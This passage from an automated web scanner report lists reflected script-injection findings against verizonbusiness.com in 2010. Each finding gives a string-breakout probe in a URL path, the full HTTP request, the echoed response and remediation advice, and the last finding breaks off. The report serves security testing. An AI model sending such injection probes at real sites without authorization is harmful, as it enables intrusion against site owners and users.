<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/abouta875d';99415106e64/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml'.toLowerCase().replace(/_/,'/');
v
...[SNIP]...

1.436. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb9e5"%3b9c7c8a3de80 was submitted in the REST URL parameter 1. This input was echoed as bb9e5";9c7c8a3de80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbb9e5"%3b9c7c8a3de80/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:47:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40922
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutbb9e5";9c7c8a3de80/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml";

hbx.pndef="title";//DEFAULT PAG
...[SNIP]...

1.437. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21736'%3be06083264ed was submitted in the REST URL parameter 2. This input was echoed as 21736';e06083264ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news21736'%3be06083264ed/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47383
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news21736';e06083264ed/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml'.toLowerCase().replace(/_/,'/');
var ru
...[SNIP]...

1.438. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54486"%3b47c476f6ab4 was submitted in the REST URL parameter 2. This input was echoed as 54486";47c476f6ab4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news54486"%3b47c476f6ab4/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47385
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news54486";47c476f6ab4/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml";

hbx.pndef="title";//DEFAULT PAGE NAM
...[SNIP]...

1.439. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c48af'%3b06b2f34cc8b was submitted in the REST URL parameter 3. This input was echoed as c48af';06b2f34cc8b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c48af'%3b06b2f34cc8b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/c48af';06b2f34cc8b'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.440. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c13c"%3bcc12e40f49 was submitted in the REST URL parameter 3. This input was echoed as 5c13c";cc12e40f49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/5c13c"%3bcc12e40f49 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:57 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/5c13c";cc12e40f49";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.441. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3a34"%3bfb291d20a22 was submitted in the REST URL parameter 1. This input was echoed as e3a34";fb291d20a22 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboute3a34"%3bfb291d20a22/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:29 GMT
Content-Type: text/html
Content-Length: 40794
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboute3a34";fb291d20a22/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PA
...[SNIP]...

1.442. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be552'%3b4ef65abbe38 was submitted in the REST URL parameter 1. This input was echoed as be552';4ef65abbe38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbe552'%3b4ef65abbe38/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:38 GMT
Content-Type: text/html
Content-Length: 40792
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutbe552';4ef65abbe38/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.
...[SNIP]...

1.443. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a86a"%3bcdb276b3d13 was submitted in the REST URL parameter 2. This input was echoed as 3a86a";cdb276b3d13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news3a86a"%3bcdb276b3d13/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:47:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47253
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news3a86a";cdb276b3d13/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VA
...[SNIP]...

1.444. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f04a'%3b55d58441ffc was submitted in the REST URL parameter 2. This input was echoed as 9f04a';55d58441ffc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news9f04a'%3b55d58441ffc/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47253
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news9f04a';55d58441ffc/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.lengt
...[SNIP]...

1.445. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddf82"%3b5ee4db7527a was submitted in the REST URL parameter 3. This input was echoed as ddf82";5ee4db7527a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/ddf82"%3b5ee4db7527a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:42 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/ddf82";5ee4db7527a";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.446. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 925a2'%3b422a594066 was submitted in the REST URL parameter 3. This input was echoed as 925a2';422a594066 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/925a2'%3b422a594066 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/925a2';422a594066'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.447. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
